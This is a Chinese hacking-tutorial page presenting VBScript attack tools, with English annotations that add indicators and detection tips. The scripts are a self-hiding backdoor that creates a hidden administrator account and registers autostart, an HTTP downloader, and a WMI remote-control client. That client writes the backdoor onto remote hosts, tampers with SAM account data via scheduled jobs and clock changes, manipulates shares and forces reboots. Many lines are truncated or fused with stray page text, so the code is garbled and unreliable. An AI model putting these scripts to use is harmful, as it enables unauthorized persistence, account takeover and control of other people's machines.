黑客必须要知道的几个vbs文件代码
1. door.vbs
'***************
'door.vbs by ⿊嘿⿊
'***************
' Backdoor/persistence sample, annotated for analysis. The script hides its own
' file, creates a local account, adds it to the Administrators group, and
' registers itself under autostart registry locations.
' NOTE(review): the last two lines are damaged on this page (a line break inside
' the RegWrite call and a truncated "write" statement), so the listing does not
' parse as shown.
dim wsh,FA,FSO
set fso=CreateObject("Scripting.FileSystemObject")
' Handle to this script's own file on disk.
Set FA= FSO.GetFile(WScript.scriptFullName)
' 34 = Hidden (2) + Archive (32): marks the script file itself as hidden.
FA.Attributes =34
set wsh=CreateObject("WScript.Shell")
' Both net commands run with window style 0 (hidden) and wait for completion.
' Detection: local account creation and Administrators group changes are logged
' as Security events 4720 and 4732 when account-management auditing is enabled;
' the account name IUSE_SERVER is an indicator taken from this listing.
wsh.run "net user IUSE_SERVER xyhack.91i /add",0,true
wsh.run "net localgroup administrators IUSE_SERVER /add" ,0,true
' Autostart: HKLM Run value "Win32" pointing at this script's path.
wsh.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32",""&FA&""
' SHOWALL\CheckedValue set to 0 targets Explorer's "show hidden files" option.
' The statement after it targets the Command Processor AutoRun value, which the
' page describes as starting the script whenever cmd starts. Both values are
' worth baselining and alerting on when they change.
wsh.Regwrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD" write "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun",""&FA&""
功能:添加不死帐号(随cmd启动而启动),在win下彻底隐藏。
使用:直接运行。
2. ntlm.vbs
'***************
'ntlm.vbs by ⿊嘿⿊
'***************
' NOTE(review): only the object setup survives on this page; the statements that
' would change the Telnet NTLM and port settings are missing from the listing.
dim wsh
set wsh=CreateObject("WScript.Shell")
功能:自定义telnet的ntlm和端口。
使用:D:\>ntlm.vbs 1 999
3. iget.vbs
'***************************
'iget.vbs Mod by ⿊嘿⿊
'***************************
' Command-line HTTP downloader: fetches the URL given as argument 0 and writes
' the response to the path given as argument 1.
' Detection: a script host (wscript/cscript) that instantiates Microsoft.XMLHTTP
' and ADODB.Stream, makes an outbound HTTP request and then creates a file is a
' common downloader pattern; correlate script-host network connections with
' file-creation events.
' NOTE(review): two lines below are damaged on this page (stray page text fused
' onto the Mode line, and a truncated write of the response body).
Set xPost = CreateObject("Microsoft.XMLHTTP")
' Third argument 0 = synchronous request; the URL is lower-cased before use.
xPost.Open "GET",LCase(WScript.Arguments(0)),0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
' Mode 3 = read/write.
黑客必备cmd命令大全sGet.Mode = 3
' Type 1 = binary stream, so the payload is saved byte-for-byte.
sGet.Type = 1
sGet.Open()
sGet.sponseBody)
' Option 2 = overwrite an existing file at the destination path.
sGet.SaveToFile LCase(WScript.Arguments(1)),2
功能:命令行下下载http文件。
使用:D:\>iget.vbs xyhack.91i/vbs.rar vbs.rar
4. rcmd.vbs
'***************
'rcmd.vbs by ⿊嘿⿊
'***************
' Entry section of a remote-administration client built on WMI scripting
' (SWbemLocator). It takes target address, user name and password from the
' command line, connects to the root/cimv2 namespace, requests extra WMI
' privileges, and hands control to main() (defined outside this listing).
' NOTE(review): several statements are truncated on this page ("set ateObject",
' "if unt<3", "set tserver(...)"), so this section does not parse as shown.
' Detection: credentials passed as arguments appear in process command-line
' logging; on the target, remote WMI use shows up as network logons and in the
' WMI-Activity operational log.
' Errors are suppressed globally; failures are only surfaced via err.number.
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
' Apparently a check on the host executable name that relaunches the script
' under cscript; the compared string is missing here. TODO confirm
if (lcase(right(wscript.fullname,11))="") then
set ateObject("wscript.shell")
objShell.Run(" /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
end if
' Presumably an argument-count check: print usage and exit with fewer than 3.
if unt<3 then
usage()
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
usage()
outstreem.write "Conneting "&ipaddress&"...."
set objlocator=createobject("wbemscripting.swbemlocator") '20
set tserver(ipaddress,"root/cimv2",username,password)
' WbemPrivilegeEnum values requested on the connection:
' 23 = RemoteShutdown, 18 = Shutdown, 7 = Security, 11 = Systemtime.
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
objswbemservices.security_.privileges.add 7,true
objswbemservices.security_.privileges.add 11,true
' Both branches end in main(); the error-reporting body is missing on this page.
if errornumber<>0 then
call main()
else
end if
call main()
'***********************************************************
function door()
' Builds one long "cmd /c echo ... >> file" command line that writes a copy of
' the door.vbs backdoor to the connected host line by line. Judging from
' "set (""win32_process"")" the command is meant to be launched through WMI
' Win32_Process, but the Create call is missing on this page. TODO confirm
' NOTE(review): several continuation lines are broken by the page extraction
' (line breaks inside string literals, "echo wsh.Reg" truncated to "write",
' "%win dir%"), so the string does not parse as shown.
' Indicators visible in this listing:
'   files     %windir%\system32\svrer.vbs, %windir%\system32\SYSTEM.bat
'   account   IUSE_SERVER, added to the local Administrators group
'   registry  HKLM ...\CurrentVersion\Run\Win32,
'             HKLM and HKCU ...\Command Processor\AutoRun,
'             ...\Hidden\SHOWALL\CheckedValue = 0
'   schedule  "at" jobs at 20:00, 20:10, 20:20 and 20:30 running SYSTEM.bat
' Detection: a remote Win32_Process creation of cmd.exe with a long chain of
' "echo ... >>" redirections into system32 is itself a strong signal.
outstreem.write "Creating the blankdoor .."
set ("win32_process")
cmddoor="cmd /c echo dim wsh,FA,FSO,t>%windir%\system32\svrer.vbs" _
&"&& echo set fso=CreateObject(""Scripting.FileSystemObject"") >>%windir%\system32\svrer.vbs" _
&"&& echo Set FA= FSO.GetFile(WScript.scriptFullName)>>%windir%\system32\svrer.vbs" _
&"&& echo FA.Attributes =34>>%windir%\system32\svrer.vbs" _
&"&& echo set t=fso.CreateTextFile(""%windir%\system32\SYSTEM.bat"",true)>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""net user IUSE_SERVER xyhack.91i /add"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""net localgroup administrators IUSE_SERVER /add"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.WriteLine(""Attrib +h %windir%\system32\SYSTEM.bat"")>>%windir%\system32\svrer.vbs" _
&"&& echo t.Close>>%windir%\system32\svrer.vbs"_
&"&& echo set wsh=CreateObject(""WScript.Shell"")>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""net user IUSE_SERVER xyhack.91i /add"",0,true>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""net localgroup administrators IUSE_SERVER /add"" ,0,true>>%windir%\system32\svrer.vbs" _
&"&& echo wsh.Regwrite
""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.Regwrite
""HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"",0,""REG_DWORD"">>%win dir%\system32\svrer.vbs" _
&"&& write ""HKEY_LOCAL_MACHINE\Software\Microsoft\Command
Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& write ""HKEY_CURRENT_USER\Software\Microsoft\Command
Processor\AutoRun"",""%windir%\system32\svrer.vbs"">>%windir%\system32\svrer.vbs" _
&"&& echo wsh.run ""cmd /c at 20:00,20:10,20:20,20:30 %windir%\system32\SYSTEM.bat"",0,true
>>%windir%\system32\svrer.vbs"
' The statements that would launch cmddoor and then run the dropped script are
' not present on this page; only the status output and error checks remain.
showerror(err.number)
Wscript.Sleep(1500)
outstreem.write "Runing the blankdoor .."
showerror(err.number)
' Returns to the interactive menu (main is defined outside this listing).
call main()
end function
'***********************************************************
function ca()
' Account-tampering routine. It resolves an account name to its RID, generates
' two helper scripts in %temp% on the connected host, and uses the "at"
' scheduler plus a temporary system-clock change to get the first helper run by
' the Schedule service. The generated helper references the SAM hive directly
' (Users\000001F4 and a key derived from the chosen account, binary value "F").
' NOTE(review): many statements are truncated on this page (the WMI query
' assignments, the Win32_Process create calls, the registry read of "caflag"),
' so the listing does not parse as shown.
' Indicators visible in this listing:
'   files     %temp%\ca.vbs, %temp%\getsys.vbs
'   registry  HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\caflag
'             writes under HKLM\SAM\SAM\Domains\Account\Users\<RID>\F
'   behaviour system time set to 23:58:59.90 and restored about a second later,
'             an "at 23:59" job, Schedule service start-mode/state flipped
' Detection: direct writes under SAM\SAM\Domains\Account\Users are not part of
' normal account management; system time changes are logged as Security event
' 4616 when that audit category is enabled.
Wscript.Echo "enter the causername:"
causername=WScript.StdIn.Readline()
Wscript.Echo "enter the capassword:"
' capassword is read but not used in the lines visible here.
capassword=WScript.StdIn.Readline()
outstreem.write "Getting SID of "&causername&" ...."
set query("select * from win32_useraccount where name="&chr(34)&causername&chr(34))
for each objinstsid in colinstsid
strsid=objinstsid.sid
' Take the last SID component (the RID), convert it to hex and left-pad it with
' zeros to 8 characters; this matches the SAM Users sub-key naming.
sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))
strflag=cstr(hex(sidflag))
regname=string(8-len(strflag),"0")&strflag
next
' No SID found: back to the menu (the error message is missing on this page).
if strsid="" then
call main()
else
end if
outstreem.write "Prepairing .."
set ("win32_process")
showerroronly(err.number)
' First helper, %temp%\ca.vbs: uses StdRegProv against ^&h80000002 (HKLM) and
' finally writes the "caflag" marker that the polling loop below waits for.
cmdline="cmd /c echo set oreg=getobject(""winmgmts:root\default:stdregprov"")>%temp%\ca.vbs" _
&"&& binaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\000001F4"",""F"",uvalue >>%temp%\ca.vbs" _ &"&& echo oreg.setbinaryvalue ^&h80000002,""SAM\SAM\Domains\Account\Users\"?name&""",""F"",u
value >>%temp%\ca.vbs" _ &"&& echo set sh=createobject(""wscript.shell"")>>%temp%\ca.vbs" _
&"&& write ""HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\caflag"",""1"" >>%temp%\ca.vbs" ate(cmdline)
showerroronly(err.number)
' Second helper, %temp%\getsys.vbs: saves the current time, schedules ca.vbs
' with "at 23:59", moves the clock to 23:58:59.90, sleeps 1100 ms so the job
' fires, then restores the saved time.
cmdline="cmd /c echo atime=time>%temp%\getsys.vbs" _
&"&& echo set sh=createobject(""wscript.shell"")>>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c at 23:59 cscript %temp%\ca.vbs"",0,true >>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c time 23:58:59.90"",0,true >>%temp%\getsys.vbs" _
&"&& echo wscript.sleep(1100)>>%temp%\getsys.vbs" _
&"&& echo sh.run ""cmd /c time ""^&atime,0,true >>%temp%\getsys.vbs"
showerror(err.number)
outstreem.write "Processing ."
' The "at" command depends on the Schedule service, so it is looked up here.
set query("select * from win32_service where name='schedule'")
showerroronly(err.number)
for each objinstsvr in colinstsvr
' flag1/flag2 record what was changed so it can be reverted after the run.
flag1=0
flag2=0
if objinstsvr.startmode="Disabled" then
objinstsvr.changestartmode("Manual")
flag1=1
end if
if objinstsvr.started=flase then
errnumber=objinstsvr.startservice()
flag2=1
end if
showerroronly(err.number)
showerroronly(err.number)
set tserver(ipaddress,"root/default",username,password).get("stdregprov")
' Poll up to 20 times at 500 ms intervals for svalue = "1"; the statement that
' reads svalue (presumably the caflag value) is missing on this page.
for i=1 to 20
if svalue="1" then
exit for
else
wscript.sleep(500)
end if
next
' Put the Schedule service back the way it was found.
if flag1 then objinstsvr.changestartmode("Disabled")
if flag2 then objinstsvr.stopservice()
next
if svalue<>"1" then
else
showerror(err.number)
end if
outstreem.write "Clean Up .."
showerroronly(err.number)
showerroronly(err.number)
' Removes the caflag marker; the statements that would delete the two helper
' scripts are not visible here, so they may remain on disk. TODO confirm
if svalue="1" then objinstreg.deletevalue &h80000002,"SOFTWARE\Microsoft\Windows Script Host\Settings","caflag" showerror(err.number)
call main()
end function
function showerroronly(errornumber)
' Progress/error helper: writes a single "." when errornumber is zero, and
' returns to main() when it is non-zero.
' NOTE(review): the body of the inner "if" (presumably printing
' err.description) is missing on this page.
if errornumber Then
if err.description <> "" then
end if
call main()
else
outstreem.write "."
end if
end function
'***********************************************************
function share()
' Interactive sub-menu for network shares on the connected host: reads one line
' from stdin and dispatches to listshare, openshare or closeshare, or returns
' to main(). Input that matches no case falls through and the function ends.
' NOTE(review): most of the menu text is missing on this page.
Wscript.Echo string(18,"-")
Wscript.Echo "0.返回CMD> ="
Wscript.Echo "please chose the parameter:"
parameters=WScript.StdIn.Readline()
Select Case parameters
case "quit" , "0"
main()
case "list" , "1"
listshare()
case "open" , "2" '40
openshare()
case "close" ,"3"
closeshare()
end Select
end function
function listshare()
' Enumerates Win32_Share on the connected host and prints caption, name and
' path for each share, then returns to the share menu.
' NOTE(review): the output calls are truncated on this page (the two lines that
' start with an opening parenthesis have lost the name of the called routine).
outstreem.write "Listing the Netshare from "&ipaddress&"...."
Set colShares = objswbemservices.ExecQuery("Select * from Win32_Share") showerror(err.number) '50
("Caption"&chr(9)&chr(9)&"Name: "&chr(9)&chr(9)&"Path")
For each objShare in colShares
(objShare.Caption&chr(9)&objShare.Name &chr(9)&chr(9)&objShare.Path) Next
call share()
end function
function openshare()
' Creates a new share on the connected host through Win32_Share.Create, using a
' path and a share name read from stdin (the prompts are missing on this page).
' Detection: share creation is logged as Security event 5142 when file-share
' auditing is enabled; the fixed description string below is an indicator.
path=WScript.StdIn.Readline()
sname=WScript.StdIn.Readline()
' Share type 0 is a disk share; at most 25 simultaneous connections.
Const FILE_SHARE = 0
Const MAXIMUM_CONNECTIONS = 25
Set objNewShare = objswbemservices.Get("Win32_Share")
' errReturn is assigned but not checked in the lines visible here.
errReturn = objNewShare.Create _
(path, sname, FILE_SHARE, _
MAXIMUM_CONNECTIONS, "默认共享")
call share()
end function
function closeshare()
' Deletes every share on the connected host whose name equals the string read
' from stdin, then returns to the share menu.
' Detection: share removal is logged as Security event 5144 when file-share
' auditing is enabled.
kname=WScript.StdIn.Readline()
outstreem.write "killing the "&kname&" ...."
' The name is concatenated into the WQL text without any escaping.
Set colShares = objswbemservices.ExecQuery _
("Select * from Win32_Share Where Name ="&"'"&kname&"' ")
For Each objShare in colShares
objShare.Delete
Next
showerror(err.number)
call share()
end function
'***********************************************************
function listsvr()
' Enumerates Win32_Service on the connected host and prints name, state, start
' mode and binary path for each service, then returns to main().
' NOTE(review): the output calls are truncated on this page (the lines that
' start with an opening parenthesis have lost the name of the called routine).
outstreem.write "Listing the Service from "&ipaddress&"...."
Set colListOfServices = objswbemservices.ExecQuery _
("Select * from Win32_Service")
showerror(err.number)
("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"Path Name ")
For Each objService in colListOfServices
' Names shorter than 8 characters get an extra tab so the columns line up.
if len(objService.name)<8 then
strname=objService.name&chr(9)
else
strname=objService.name
end if
(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName) Next
call main()
end function
'************************************************************
function reboot()
' Reboots the connected host through WMI by calling Win32Shutdown on the
' primary Win32_OperatingSystem instance, then returns to main().
' NOTE(review): the query assignment is truncated on this page ("set query(").
' Detection: an unexpected restart initiated over WMI appears in the System log
' as a shutdown-initiated event (1074) on the target. TODO confirm for the
' Windows versions in scope.
outstreem.write "Now, "
strwqlquery="select * from win32_operatingsystem where primary='true'"
set query(strwqlquery)
for each objinstance in colinstances
' 6 = Reboot (2) + Force (4): restart without waiting for applications to close.
objinstance.win32shutdown(6)
next
showerror(err.number)
call main()
end function
'*************************************************************
function inf()
outstreem.write "Getting Infomation from "&ipaddress&"...."
set obj1=objget("win32_computersystem")
showerror(err.number)
set obj2=objget("win32_operatingsystem")
set col3=objswbemservices.instancesof("win32_processor")
set obj4=objget("win32_logicalmemoryconfiguration")
set obj5=objget("win32_bios")
set obj6=objget("win32_displayconfiguration")
set col7=objswbemservices.instancesof("win32_diskdrive")
set col8=objswbemservices.instancesof("win32_logicaldisk")
set col9=objswbemservices.instancesof("win32_networkadapterconfiguration")
set col10=objswbemservices.instancesof("win32_quickfixengineering")
wnl "OS Info :"
wnl " Computer Name : "&obj1.name
wnl " User Name : "&obj1.username
wnl " Domain : "&obj1.domain
domainrole=""
select case obj1.domainrole
case 0
domainrole="Workstation"
case 1
domainrole="Member Workstation"
case 2
domainrole="Server"
case 3
domainrole="Member Server"
case 4
domainrole="Backup Domain Controller"
case 5
domainrole="Main Domain Controller"
end select